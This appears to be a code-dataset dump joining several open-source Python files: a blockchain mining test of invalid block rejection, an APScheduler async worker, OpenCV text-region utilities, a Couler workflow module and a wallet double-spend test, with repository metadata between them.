assert_raises_rpc_error(-22, "Block decode failed", node.submitblock, b2x(block.serialize()[:-15]))
self.log.info("getblocktemplate: Test bad input hash for coinbase transaction")
bad_block = copy.deepcopy(block)
bad_block.vtx[0].vin[0].prevout.hash += 1
bad_block.vtx[0].rehash()
assert_template(node, bad_block, 'bad-cb-missing')
self.log.info("submitblock: Test invalid coinbase transaction")
assert_raises_rpc_error(-22, "Block does not start with a coinbase", node.submitblock, b2x(bad_block.serialize()))
self.log.info("getblocktemplate: Test truncated final transaction")
assert_raises_rpc_error(-22, "Block decode failed", node.getblocktemplate, {'data': b2x(block.serialize()[:-1]), 'mode': 'proposal'})
self.log.info("getblocktemplate: Test duplicate transaction")
bad_block = copy.deepcopy(block)
bad_block.vtx.append(bad_block.vtx[0])
assert_template(node, bad_block, 'bad-txns-duplicate')
self.log.info("getblocktemplate: Test invalid transaction")
bad_block = copy.deepcopy(block)
bad_tx = copy.deepcopy(bad_block.vtx[0])
bad_tx.vin[0].prevout.hash = 255
bad_tx.rehash()
bad_block.vtx.append(bad_tx)
assert_template(node, bad_block, 'bad-txns-inputs-missingorspent')
self.log.info("getblocktemplate: Test nonfinal transaction")
bad_block = copy.deepcopy(block)
bad_block.vtx[0].nLockTime = 2 ** 32 - 1
bad_block.vtx[0].rehash()
assert_template(node, bad_block, 'bad-txns-nonfinal')
self.log.info("getblocktemplate: Test bad tx count")
TX_COUNT_OFFSET = 80
bad_block_sn = bytearray(block.serialize())
assert_equal(bad_block_sn[TX_COUNT_OFFSET], 1)
bad_block_sn[TX_COUNT_OFFSET] += 1
assert_raises_rpc_error(-22, "Block decode failed", node.getblocktemplate, {'data': b2x(bad_block_sn), 'mode': 'proposal'})
self.log.info("getblocktemplate: Test bad bits")
bad_block = copy.deepcopy(block)
bad_block.nBits = 469762303
assert_template(node, bad_block, 'bad-diffbits')
self.log.info("getblocktemplate: Test bad merkle root")
bad_block = copy.deepcopy(block)
bad_block.hashMerkleRoot += 1
assert_template(node, bad_block, 'bad-txnmrklroot', False)
self.log.info("getblocktemplate: Test bad timestamps")
bad_block = copy.deepcopy(block)
bad_block.nTime = 2 ** 31 - 1
assert_template(node, bad_block, 'time-too-new')
bad_block.nTime = 0
assert_template(node, bad_block, 'time-too-old')
self.log.info("getblocktemplate: Test not best block")
bad_block = copy.deepcopy(block)
bad_block.hashPrevBlock = 123
assert_template(node, bad_block, 'inconclusive-not-best-prevblk')
if __name__ == '__main__':
MiningTest().main()
| true | true |
79010e1bdee63e2f2433d37394cdf133896e846e | 6,082 | py | Python | apscheduler/workers/async_.py | daya0576/apscheduler | 61b8b44c712c9a28e613044b12c553adbc6ca015 | [
"MIT"
] | 3 | 2021-04-02T14:44:13.000Z | 2022-01-27T08:41:28.000Z | apscheduler/workers/async_.py | zhenhua32/apscheduler | d10f20215d8c78e9e2d32d634f276bb89f86ca38 | [
"MIT"
] | null | null | null | apscheduler/workers/async_.py | zhenhua32/apscheduler | d10f20215d8c78e9e2d32d634f276bb89f86ca38 | [
"MIT"
] | null | null | null | import os
import platform
import threading
from asyncio import current_task, iscoroutinefunction
from collections.abc import Coroutine
from contextlib import AsyncExitStack
from datetime import datetime, timezone
from functools import partial
from logging import Logger, getLogger
from traceback import format_exc
from typing import Any, Callable, Dict, Optional, Set
from anyio import create_event, create_task_group, open_cancel_scope, run_sync_in_worker_thread
from anyio.abc import CancelScope, Event, TaskGroup
from ..abc import DataStore, Job
from ..events import EventHub, JobDeadlineMissed, JobFailed, JobSuccessful, JobUpdated
class AsyncWorker(EventHub):
"""Runs jobs locally in a task group."""
_task_group: Optional[TaskGroup] = None
_stop_event: Optional[Event] = None
_running: bool = False
_running_jobs: int = 0
_acquire_cancel_scope: Optional[CancelScope] = None
def __init__(self, data_store: DataStore, *, max_concurrent_jobs: int = 100,
identity: Optional[str] = None, logger: Optional[Logger] = None,
run_sync_functions_in_event_loop: bool = True):
super().__init__()
self.data_store = data_store
self.max_concurrent_jobs = max_concurrent_jobs
self.identity = identity or f'{platform.node()}-{os.getpid()}-{threading.get_ident()}'
self.logger = logger or getLogger(__name__)
self.run_sync_functions_in_event_loop = run_sync_functions_in_event_loop
self._acquired_jobs: Set[Job] = set()
self._exit_stack = AsyncExitStack()
if self.max_concurrent_jobs < 1:
raise ValueError('max_concurrent_jobs must be at least 1')
async def __aenter__(self):
await self._exit_stack.__aenter__()
# Initialize the data store
await self._exit_stack.enter_async_context(self.data_store)
# Start the actual worker
self._task_group = create_task_group()
await self._exit_stack.enter_async_context(self._task_group)
start_event = create_event()
await self._task_group.spawn(self.run, start_event)
await start_event.wait()
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self.stop(force=exc_type is not None)
await self._exit_stack.__aexit__(exc_type, exc_val, exc_tb)
async def run(self, start_event: Optional[Event] = None) -> None:
self._stop_event = create_event()
self._running = True
if start_event:
await start_event.set()
while self._running:
limit = self.max_concurrent_jobs - self._running_jobs
jobs = []
async with open_cancel_scope() as self._acquire_cancel_scope:
try:
jobs = await self.data_store.acquire_jobs(self.identity, limit)
finally:
del self._acquire_cancel_scope
for job in jobs:
await self._task_group.spawn(self._run_job, job)
await self._stop_event.set()
del self._stop_event
del self._task_group
async def _run_job(self, job: Job) -> None:
# Check if the job started before the deadline
now = datetime.now(timezone.utc)
if job.start_deadline is not None:
if now.timestamp() > job.start_deadline.timestamp():
self.logger.info('Missed the deadline of job %r', job.id)
event = JobDeadlineMissed(
now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id,
scheduled_fire_time=job.scheduled_fire_time, start_time=now,
start_deadline=job.start_deadline
)
await self.publish(event)
return
# Set the job as running and publish a job update event
self.logger.info('Started job %r', job.id)
job.started_at = now
event = JobUpdated(
timestamp=now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id
)
await self.publish(event)
self._running_jobs += 1
try:
return_value = await self._call_job_func(job.func, job.args, job.kwargs)
except BaseException as exc:
self.logger.exception('Job %r raised an exception', job.id)
event = JobFailed(
timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,
schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,
start_time=now, start_deadline=job.start_deadline,
traceback=format_exc(), exception=exc
)
else:
self.logger.info('Job %r completed successfully', job.id)
event = JobSuccessful(
timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,
schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,
start_time=now, start_deadline=job.start_deadline, return_value=return_value
)
self._running_jobs -= 1
await self.data_store.release_jobs(self.identity, [job])
await self.publish(event)
async def _call_job_func(self, func: Callable, args: tuple, kwargs: Dict[str, Any]):
if not self.run_sync_functions_in_event_loop and not iscoroutinefunction(func):
wrapped = partial(func, *args, **kwargs)
return await run_sync_in_worker_thread(wrapped)
return_value = func(*args, **kwargs)
if isinstance(return_value, Coroutine):
return_value = await return_value
return return_value
async def stop(self, force: bool = False) -> None:
self._running = False
if self._acquire_cancel_scope:
await self._acquire_cancel_scope.cancel()
if force and self._task_group:
await self._task_group.cancel_scope.cancel()
async def wait_until_stopped(self) -> None:
if self._stop_event:
await self._stop_event.wait()
| 40.278146 | 95 | 0.65735 | import os
import platform
import threading
from asyncio import current_task, iscoroutinefunction
from collections.abc import Coroutine
from contextlib import AsyncExitStack
from datetime import datetime, timezone
from functools import partial
from logging import Logger, getLogger
from traceback import format_exc
from typing import Any, Callable, Dict, Optional, Set
from anyio import create_event, create_task_group, open_cancel_scope, run_sync_in_worker_thread
from anyio.abc import CancelScope, Event, TaskGroup
from ..abc import DataStore, Job
from ..events import EventHub, JobDeadlineMissed, JobFailed, JobSuccessful, JobUpdated
class AsyncWorker(EventHub):
_task_group: Optional[TaskGroup] = None
_stop_event: Optional[Event] = None
_running: bool = False
_running_jobs: int = 0
_acquire_cancel_scope: Optional[CancelScope] = None
def __init__(self, data_store: DataStore, *, max_concurrent_jobs: int = 100,
identity: Optional[str] = None, logger: Optional[Logger] = None,
run_sync_functions_in_event_loop: bool = True):
super().__init__()
self.data_store = data_store
self.max_concurrent_jobs = max_concurrent_jobs
self.identity = identity or f'{platform.node()}-{os.getpid()}-{threading.get_ident()}'
self.logger = logger or getLogger(__name__)
self.run_sync_functions_in_event_loop = run_sync_functions_in_event_loop
self._acquired_jobs: Set[Job] = set()
self._exit_stack = AsyncExitStack()
if self.max_concurrent_jobs < 1:
raise ValueError('max_concurrent_jobs must be at least 1')
async def __aenter__(self):
await self._exit_stack.__aenter__()
await self._exit_stack.enter_async_context(self.data_store)
self._task_group = create_task_group()
await self._exit_stack.enter_async_context(self._task_group)
start_event = create_event()
await self._task_group.spawn(self.run, start_event)
await start_event.wait()
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
await self.stop(force=exc_type is not None)
await self._exit_stack.__aexit__(exc_type, exc_val, exc_tb)
async def run(self, start_event: Optional[Event] = None) -> None:
self._stop_event = create_event()
self._running = True
if start_event:
await start_event.set()
while self._running:
limit = self.max_concurrent_jobs - self._running_jobs
jobs = []
async with open_cancel_scope() as self._acquire_cancel_scope:
try:
jobs = await self.data_store.acquire_jobs(self.identity, limit)
finally:
del self._acquire_cancel_scope
for job in jobs:
await self._task_group.spawn(self._run_job, job)
await self._stop_event.set()
del self._stop_event
del self._task_group
async def _run_job(self, job: Job) -> None:
now = datetime.now(timezone.utc)
if job.start_deadline is not None:
if now.timestamp() > job.start_deadline.timestamp():
self.logger.info('Missed the deadline of job %r', job.id)
event = JobDeadlineMissed(
now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id,
scheduled_fire_time=job.scheduled_fire_time, start_time=now,
start_deadline=job.start_deadline
)
await self.publish(event)
return
self.logger.info('Started job %r', job.id)
job.started_at = now
event = JobUpdated(
timestamp=now, job_id=job.id, task_id=job.task_id, schedule_id=job.schedule_id
)
await self.publish(event)
self._running_jobs += 1
try:
return_value = await self._call_job_func(job.func, job.args, job.kwargs)
except BaseException as exc:
self.logger.exception('Job %r raised an exception', job.id)
event = JobFailed(
timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,
schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,
start_time=now, start_deadline=job.start_deadline,
traceback=format_exc(), exception=exc
)
else:
self.logger.info('Job %r completed successfully', job.id)
event = JobSuccessful(
timestamp=datetime.now(timezone.utc), job_id=job.id, task_id=job.task_id,
schedule_id=job.schedule_id, scheduled_fire_time=job.scheduled_fire_time,
start_time=now, start_deadline=job.start_deadline, return_value=return_value
)
self._running_jobs -= 1
await self.data_store.release_jobs(self.identity, [job])
await self.publish(event)
async def _call_job_func(self, func: Callable, args: tuple, kwargs: Dict[str, Any]):
if not self.run_sync_functions_in_event_loop and not iscoroutinefunction(func):
wrapped = partial(func, *args, **kwargs)
return await run_sync_in_worker_thread(wrapped)
return_value = func(*args, **kwargs)
if isinstance(return_value, Coroutine):
return_value = await return_value
return return_value
async def stop(self, force: bool = False) -> None:
self._running = False
if self._acquire_cancel_scope:
await self._acquire_cancel_scope.cancel()
if force and self._task_group:
await self._task_group.cancel_scope.cancel()
async def wait_until_stopped(self) -> None:
if self._stop_event:
await self._stop_event.wait()
| true | true |
79010e42d0884bf73de8caa78804f0cf9c24b92a | 3,453 | py | Python | tess/utilities/image_process.py | tonthatnam/japanese_ocr | c78ed95d940fd979bbec1f33bca085e9977cafa4 | [
"MIT"
] | 3 | 2021-02-27T16:13:44.000Z | 2021-05-21T14:08:19.000Z | tess/utilities/image_process.py | tonthatnam/japanese_ocr | c78ed95d940fd979bbec1f33bca085e9977cafa4 | [
"MIT"
] | null | null | null | tess/utilities/image_process.py | tonthatnam/japanese_ocr | c78ed95d940fd979bbec1f33bca085e9977cafa4 | [
"MIT"
] | 1 | 2021-04-03T04:01:57.000Z | 2021-04-03T04:01:57.000Z | from PIL import Image
import tempfile
import cv2
import imutils
import numpy as np
def set_image_dpi_ppi(file_path):
im = Image.open(file_path)
length_x, width_y = im.size
factor = float(length_x/width_y)
size = int(600), int(600/factor)
im_resized = im.resize(size, Image.ANTIALIAS)
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
temp_filename = temp_file.name
im_resized.save(temp_filename, dpi=(800, 800))
return temp_filename
def set_text_region(file_path):
img = cv2.imread(file_path)
height = img.shape[0]
width = img.shape[1]
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
sobel = cv2.Sobel(gray, cv2.CV_8U, 1, 0, ksize=3)
ret, binary = cv2.threshold(sobel, 0, 255, cv2.THRESH_OTSU + cv2.THRESH_BINARY)
element1 = cv2.getStructuringElement(cv2.MORPH_RECT, (int(width/2), 5))
element2 = cv2.getStructuringElement(cv2.MORPH_RECT, (int(width/3), 2))
dilation = cv2.dilate(binary, element2, iterations=1)
erosion = cv2.erode(dilation, element1, iterations=1)
dilation2 = cv2.dilate(erosion, element2, iterations=2)
region = []
contours, hierarchy = cv2.findContours(dilation2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for i in range(len(contours)):
cnt = contours[i]
area = cv2.contourArea(cnt)
if (area < height*width/6):
continue
rect = cv2.minAreaRect(cnt)
box = cv2.boxPoints(rect)
box = np.int0(box)
height = abs(box[0][1] - box[2][1])
width = abs(box[0][0] - box[2][0])
if (height > width * 1.3):
continue
region.append(box)
return img, region
def set_sign_board_region(file_path):
image = cv2.imread(file_path)
height = image.shape[0]
width = image.shape[1]
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.bilateralFilter(gray, 25, 15, 15)
thresh = cv2.threshold(blurred, 90, 255, cv2.THRESH_BINARY)[1]
output = image.copy()
cnts = cv2.findContours(thresh.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
region = []
for c in cnts:
epsilon = 0.02 * cv2.arcLength(c, True)
c = cv2.approxPolyDP(c, epsilon, True)
area = cv2.contourArea(c)
if area < int(height*width/3):
continue
x,y,w,h = cv2.boundingRect(c)
cv2.rectangle(output,(x,y),(x+w,y+h),(0,255,0),2)
region.append((x,y,x+w,y+h))
return output, region
def add_margin(file_path, top, right, bottom, left, color):
image = Image.open(file_path)
width, height = image.size
new_width = width + right + left
new_height = height + top + bottom
result = Image.new(image.mode, (new_width, new_height), color)
result.paste(image, (left, top))
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
temp_filename = temp_file.name
result.save(temp_filename, dpi=(800, 800))
return temp_filename
def process_text(file_path):
image = cv2.imread(file_path)
height = image.shape[0]
width = image.shape[1]
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.bilateralFilter(gray, 25, 15, 15)
thresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
temp_filename = temp_file.name
cv2.imwrite(temp_filename, thresh)
return temp_filename
| 36.347368 | 93 | 0.663481 | from PIL import Image
import tempfile
import cv2
import imutils
import numpy as np
def set_image_dpi_ppi(file_path):
im = Image.open(file_path)
length_x, width_y = im.size
factor = float(length_x/width_y)
size = int(600), int(600/factor)
im_resized = im.resize(size, Image.ANTIALIAS)
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
temp_filename = temp_file.name
im_resized.save(temp_filename, dpi=(800, 800))
return temp_filename
def set_text_region(file_path):
img = cv2.imread(file_path)
height = img.shape[0]
width = img.shape[1]
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
sobel = cv2.Sobel(gray, cv2.CV_8U, 1, 0, ksize=3)
ret, binary = cv2.threshold(sobel, 0, 255, cv2.THRESH_OTSU + cv2.THRESH_BINARY)
element1 = cv2.getStructuringElement(cv2.MORPH_RECT, (int(width/2), 5))
element2 = cv2.getStructuringElement(cv2.MORPH_RECT, (int(width/3), 2))
dilation = cv2.dilate(binary, element2, iterations=1)
erosion = cv2.erode(dilation, element1, iterations=1)
dilation2 = cv2.dilate(erosion, element2, iterations=2)
region = []
contours, hierarchy = cv2.findContours(dilation2, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
for i in range(len(contours)):
cnt = contours[i]
area = cv2.contourArea(cnt)
if (area < height*width/6):
continue
rect = cv2.minAreaRect(cnt)
box = cv2.boxPoints(rect)
box = np.int0(box)
height = abs(box[0][1] - box[2][1])
width = abs(box[0][0] - box[2][0])
if (height > width * 1.3):
continue
region.append(box)
return img, region
def set_sign_board_region(file_path):
image = cv2.imread(file_path)
height = image.shape[0]
width = image.shape[1]
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.bilateralFilter(gray, 25, 15, 15)
thresh = cv2.threshold(blurred, 90, 255, cv2.THRESH_BINARY)[1]
output = image.copy()
cnts = cv2.findContours(thresh.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
region = []
for c in cnts:
epsilon = 0.02 * cv2.arcLength(c, True)
c = cv2.approxPolyDP(c, epsilon, True)
area = cv2.contourArea(c)
if area < int(height*width/3):
continue
x,y,w,h = cv2.boundingRect(c)
cv2.rectangle(output,(x,y),(x+w,y+h),(0,255,0),2)
region.append((x,y,x+w,y+h))
return output, region
def add_margin(file_path, top, right, bottom, left, color):
image = Image.open(file_path)
width, height = image.size
new_width = width + right + left
new_height = height + top + bottom
result = Image.new(image.mode, (new_width, new_height), color)
result.paste(image, (left, top))
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
temp_filename = temp_file.name
result.save(temp_filename, dpi=(800, 800))
return temp_filename
def process_text(file_path):
image = cv2.imread(file_path)
height = image.shape[0]
width = image.shape[1]
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
blurred = cv2.bilateralFilter(gray, 25, 15, 15)
thresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]
temp_file = tempfile.NamedTemporaryFile(delete=False, suffix='.png')
temp_filename = temp_file.name
cv2.imwrite(temp_filename, thresh)
return temp_filename
| true | true |
79010e95ff3c3d69ff6163190fe385046a30dd10 | 8,628 | py | Python | couler/core/step_update_utils.py | javoweb/couler | 1531f31816a1505401c5326dc5fec5a8bb7bf7cd | [
"Apache-2.0"
] | null | null | null | couler/core/step_update_utils.py | javoweb/couler | 1531f31816a1505401c5326dc5fec5a8bb7bf7cd | [
"Apache-2.0"
] | null | null | null | couler/core/step_update_utils.py | javoweb/couler | 1531f31816a1505401c5326dc5fec5a8bb7bf7cd | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 The Couler Authors. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
import couler.core.templates.output
from couler.core import states, utils
from couler.core.templates import OutputArtifact, Step
def update_step(func_name, args, step_name, caller_line):
if states.workflow.dag_mode_enabled():
step_name = _update_dag_tasks(
func_name,
states._dag_caller_line,
states._upstream_dag_task,
states._upstream_dag_depends_logic,
args,
step_name=step_name,
)
states._upstream_dag_task = [step_name]
else:
if states._run_concurrent_lock:
step_name = _update_steps(
"concurrent_func_name",
states._concurrent_func_line,
args,
func_name,
)
else:
step_name = _update_steps(func_name, caller_line, args)
return step_name
def _update_dag_tasks(
function_name,
caller_line,
dependencies,
depends_logic,
args=None,
template_name=None,
step_name=None,
):
"""
A task in DAG of Argo YAML contains name, related template and parameters.
Here we insert a single task into the global tasks.
"""
if step_name is None:
function_id = utils.invocation_name(function_name, caller_line)
else:
function_id = step_name
task_template = states.workflow.get_dag_task(function_id)
if task_template is None:
task_template = OrderedDict({"name": function_id})
if dependencies is not None and isinstance(dependencies, list):
if "dependencies" in task_template:
task_template["dependencies"].extend(dependencies)
else:
task_template["dependencies"] = dependencies
if depends_logic is not None:
task_template["depends"] = depends_logic
if template_name is None:
task_template["template"] = function_name
else:
task_template["template"] = template_name
# configure the args
if args is not None:
parameters, artifacts = _get_params_and_artifacts_from_args(
args, function_name, prefix="tasks"
)
if len(parameters) > 0:
task_template["arguments"] = OrderedDict()
task_template["arguments"]["parameters"] = parameters
if len(artifacts) > 0:
if "arguments" not in task_template:
task_template["arguments"] = OrderedDict()
task_template["arguments"]["artifacts"] = artifacts
else:
# step exist on the dag, thus, we update its dependency
if dependencies is not None:
if "dependencies" in task_template:
task_template["dependencies"].extend(dependencies)
else:
task_template["dependencies"] = [dependencies]
if depends_logic is not None:
task_template["depends"] = depends_logic
t_name = function_name if template_name is None else template_name
step = Step(name=function_id, template=t_name)
if states._exit_handler_enable:
if states._when_prefix is not None:
step.when = states._when_prefix
if function_id in states.workflow.exit_handler_step:
states.workflow.exit_handler_step.get(function_id).append(
step.to_dict()
)
else:
states.workflow.exit_handler_step[function_id] = [step.to_dict()]
elif states._when_prefix is not None:
step.when = states._when_prefix
if step.name not in states.workflow.dag_tasks.keys():
step_spec = step.to_dict()
step_spec["dependencies"] = [states._when_task]
states.workflow.dag_tasks[step.name] = step_spec
else:
states.workflow.update_dag_task(function_id, task_template)
# return the current task name
return function_id
def _update_steps(function_name, caller_line, args=None, template_name=None):
"""
A step in Argo YAML contains name, related template and parameters.
Here we insert a single step into the global steps.
"""
function_id = utils.invocation_name(function_name, caller_line)
# Update `steps` only if needed
if states._update_steps_lock:
name = function_id
if states._run_concurrent_lock:
_id = utils.invocation_name(template_name, caller_line)
name = "%s-%s" % (_id, states._concurrent_func_id)
if states._sub_steps is not None:
states._concurrent_func_id = states._concurrent_func_id + 1
t_name = function_name if template_name is None else template_name
step = Step(name=name, template=t_name)
if states._when_prefix is not None:
step.when = states._when_prefix
if args is not None:
parameters, artifacts = _get_params_and_artifacts_from_args(
args,
template_name
if states._run_concurrent_lock
else function_name,
prefix="steps",
)
if len(parameters) > 0:
step.arguments = OrderedDict()
step.arguments["parameters"] = parameters
if len(artifacts) > 0:
if step.arguments is None:
step.arguments = OrderedDict()
step.arguments["artifacts"] = artifacts
if states._condition_id is not None:
function_id = states._condition_id
if states._while_lock:
if function_id in states._while_steps:
states._while_steps.get(function_id).append(step.to_dict())
else:
states._while_steps[function_id] = [step.to_dict()]
else:
if states._sub_steps is not None:
if function_id in states._sub_steps:
states._sub_steps.get(function_id).append(step.to_dict())
else:
states._sub_steps[function_id] = [step.to_dict()]
elif states._exit_handler_enable is True:
if function_id in states.workflow.exit_handler_step:
states.workflow.exit_handler_step.get(function_id).append(
step.to_dict()
)
else:
states.workflow.exit_handler_step[function_id] = [
step.to_dict()
]
else:
states.workflow.add_step(function_id, step)
return step.name
else:
return function_id
def _get_params_and_artifacts_from_args(args, input_param_name, prefix):
parameters = []
artifacts = []
if not isinstance(args, list):
args = [args]
i = 0
for arg in args:
values = couler.core.templates.output.parse_argo_output(arg, prefix)
if isinstance(values, list):
for value in values:
parameters.append(
{
"name": utils.input_parameter_name(
input_param_name, i
),
"value": value,
}
)
i += 1
else:
if isinstance(arg, OutputArtifact):
artifact_dict = {
"name": ".".join(arg.value.split(".")[5:]),
"from": values,
}
if not any(
[artifact_dict["from"] == x["from"] for x in artifacts]
):
artifacts.append(artifact_dict)
else:
parameters.append(
{
"name": utils.input_parameter_name(
input_param_name, i
),
"value": values,
}
)
i += 1
return parameters, artifacts
| 35.506173 | 78 | 0.585883 |
from collections import OrderedDict
import couler.core.templates.output
from couler.core import states, utils
from couler.core.templates import OutputArtifact, Step
def update_step(func_name, args, step_name, caller_line):
if states.workflow.dag_mode_enabled():
step_name = _update_dag_tasks(
func_name,
states._dag_caller_line,
states._upstream_dag_task,
states._upstream_dag_depends_logic,
args,
step_name=step_name,
)
states._upstream_dag_task = [step_name]
else:
if states._run_concurrent_lock:
step_name = _update_steps(
"concurrent_func_name",
states._concurrent_func_line,
args,
func_name,
)
else:
step_name = _update_steps(func_name, caller_line, args)
return step_name
def _update_dag_tasks(
function_name,
caller_line,
dependencies,
depends_logic,
args=None,
template_name=None,
step_name=None,
):
if step_name is None:
function_id = utils.invocation_name(function_name, caller_line)
else:
function_id = step_name
task_template = states.workflow.get_dag_task(function_id)
if task_template is None:
task_template = OrderedDict({"name": function_id})
if dependencies is not None and isinstance(dependencies, list):
if "dependencies" in task_template:
task_template["dependencies"].extend(dependencies)
else:
task_template["dependencies"] = dependencies
if depends_logic is not None:
task_template["depends"] = depends_logic
if template_name is None:
task_template["template"] = function_name
else:
task_template["template"] = template_name
if args is not None:
parameters, artifacts = _get_params_and_artifacts_from_args(
args, function_name, prefix="tasks"
)
if len(parameters) > 0:
task_template["arguments"] = OrderedDict()
task_template["arguments"]["parameters"] = parameters
if len(artifacts) > 0:
if "arguments" not in task_template:
task_template["arguments"] = OrderedDict()
task_template["arguments"]["artifacts"] = artifacts
else:
if dependencies is not None:
if "dependencies" in task_template:
task_template["dependencies"].extend(dependencies)
else:
task_template["dependencies"] = [dependencies]
if depends_logic is not None:
task_template["depends"] = depends_logic
t_name = function_name if template_name is None else template_name
step = Step(name=function_id, template=t_name)
if states._exit_handler_enable:
if states._when_prefix is not None:
step.when = states._when_prefix
if function_id in states.workflow.exit_handler_step:
states.workflow.exit_handler_step.get(function_id).append(
step.to_dict()
)
else:
states.workflow.exit_handler_step[function_id] = [step.to_dict()]
elif states._when_prefix is not None:
step.when = states._when_prefix
if step.name not in states.workflow.dag_tasks.keys():
step_spec = step.to_dict()
step_spec["dependencies"] = [states._when_task]
states.workflow.dag_tasks[step.name] = step_spec
else:
states.workflow.update_dag_task(function_id, task_template)
return function_id
def _update_steps(function_name, caller_line, args=None, template_name=None):
function_id = utils.invocation_name(function_name, caller_line)
if states._update_steps_lock:
name = function_id
if states._run_concurrent_lock:
_id = utils.invocation_name(template_name, caller_line)
name = "%s-%s" % (_id, states._concurrent_func_id)
if states._sub_steps is not None:
states._concurrent_func_id = states._concurrent_func_id + 1
t_name = function_name if template_name is None else template_name
step = Step(name=name, template=t_name)
if states._when_prefix is not None:
step.when = states._when_prefix
if args is not None:
parameters, artifacts = _get_params_and_artifacts_from_args(
args,
template_name
if states._run_concurrent_lock
else function_name,
prefix="steps",
)
if len(parameters) > 0:
step.arguments = OrderedDict()
step.arguments["parameters"] = parameters
if len(artifacts) > 0:
if step.arguments is None:
step.arguments = OrderedDict()
step.arguments["artifacts"] = artifacts
if states._condition_id is not None:
function_id = states._condition_id
if states._while_lock:
if function_id in states._while_steps:
states._while_steps.get(function_id).append(step.to_dict())
else:
states._while_steps[function_id] = [step.to_dict()]
else:
if states._sub_steps is not None:
if function_id in states._sub_steps:
states._sub_steps.get(function_id).append(step.to_dict())
else:
states._sub_steps[function_id] = [step.to_dict()]
elif states._exit_handler_enable is True:
if function_id in states.workflow.exit_handler_step:
states.workflow.exit_handler_step.get(function_id).append(
step.to_dict()
)
else:
states.workflow.exit_handler_step[function_id] = [
step.to_dict()
]
else:
states.workflow.add_step(function_id, step)
return step.name
else:
return function_id
def _get_params_and_artifacts_from_args(args, input_param_name, prefix):
parameters = []
artifacts = []
if not isinstance(args, list):
args = [args]
i = 0
for arg in args:
values = couler.core.templates.output.parse_argo_output(arg, prefix)
if isinstance(values, list):
for value in values:
parameters.append(
{
"name": utils.input_parameter_name(
input_param_name, i
),
"value": value,
}
)
i += 1
else:
if isinstance(arg, OutputArtifact):
artifact_dict = {
"name": ".".join(arg.value.split(".")[5:]),
"from": values,
}
if not any(
[artifact_dict["from"] == x["from"] for x in artifacts]
):
artifacts.append(artifact_dict)
else:
parameters.append(
{
"name": utils.input_parameter_name(
input_param_name, i
),
"value": values,
}
)
i += 1
return parameters, artifacts
| true | true |
79010efc28d2a0d4cf031086c42489b79a2cf15b | 6,973 | py | Python | test/functional/wallet_txn_doublespend.py | zerohourcash/zerohourcash | 2e3be4876e1775e8532b71ecb29c502e6c02616a | [
"MIT"
] | 5 | 2021-04-26T01:15:43.000Z | 2022-02-28T19:48:24.000Z | test/functional/wallet_txn_doublespend.py | zerohourcash/zerohourcash | 2e3be4876e1775e8532b71ecb29c502e6c02616a | [
"MIT"
] | null | null | null | test/functional/wallet_txn_doublespend.py | zerohourcash/zerohourcash | 2e3be4876e1775e8532b71ecb29c502e6c02616a | [
"MIT"
] | 3 | 2021-04-26T00:57:46.000Z | 2022-01-13T07:37:51.000Z | #!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test the wallet accounts properly when there is a double-spend conflict."""
from decimal import Decimal
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.zerohourconfig import INITIAL_BLOCK_REWARD
class TxnMallTest(BitcoinTestFramework):
def set_test_params(self):
self.num_nodes = 4
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument("--mineblock", dest="mine_block", default=False, action="store_true",
help="Test double-spend of 1-confirmed transaction")
def setup_network(self):
# Start with split network:
super().setup_network()
disconnect_nodes(self.nodes[1], 2)
disconnect_nodes(self.nodes[2], 1)
def run_test(self):
# All nodes should start with 1,250 BTC:
starting_balance = 25*INITIAL_BLOCK_REWARD
# All nodes should be out of IBD.
# If the nodes are not all out of IBD, that can interfere with
# blockchain sync later in the test when nodes are connected, due to
# timing issues.
for n in self.nodes:
assert n.getblockchaininfo()["initialblockdownload"] == False
for i in range(4):
assert_equal(self.nodes[i].getbalance(), starting_balance)
self.nodes[i].getnewaddress("") # bug workaround, coins generated assigned to first getnewaddress!
